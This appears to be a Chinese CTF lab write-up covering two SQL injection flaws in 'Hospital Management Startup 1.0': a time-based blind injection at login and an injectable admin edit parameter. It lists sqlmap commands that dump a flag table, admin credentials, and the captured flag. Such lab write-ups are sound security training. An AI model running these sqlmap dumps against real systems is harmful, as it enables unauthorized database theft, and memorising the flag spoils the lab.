目录
一、题目

靶标介绍:
Hospital Management Startup 1.0 sqli
进入题目:

1.登录处存在SQL注入
doctor:点击

登录抓包:

burp抓包:

sqlmap:
python sqlmap.py -r x.txt -batch -dbs

因为是时间盲注,比较慢,所以根据i春秋的靶场
ctf 库 flag 表 flag 字段
直接查询flag字段值:
python sqlmap.py -r x.txt -batch -D "ctf" -T "flag" -dump

flag{9ad8650a-1cce-4bd1-9b21-d5f7caf7ce42}
2.后台SQL注入
Admin:位置

admin:123456789
进入页面:

点击编辑:

跳转到这:

此处存在SQL注入:
python sqlmap.py -u "http://xxx.cloudeci1.ichunqiu.com/patient.php?editid=1" -D "ctf" -T "flag" -dump --batch

burp的插件CO2也可以:

输入命令 run即可:
--batch -D "ctf" -T "flag" -dump

flag{9ad8650a-1cce-4bd1-9b21-d5f7caf7ce42}
文章详细描述了两个SQL注入漏洞的利用过程,一个是登录处的时间盲注,使用sqlmap工具获取了flag,另一个是后台编辑功能的SQL注入,同样利用sqlmap和BurpSuite的CO2插件提取了flag信息。

701

被折叠的 条评论
为什么被折叠?



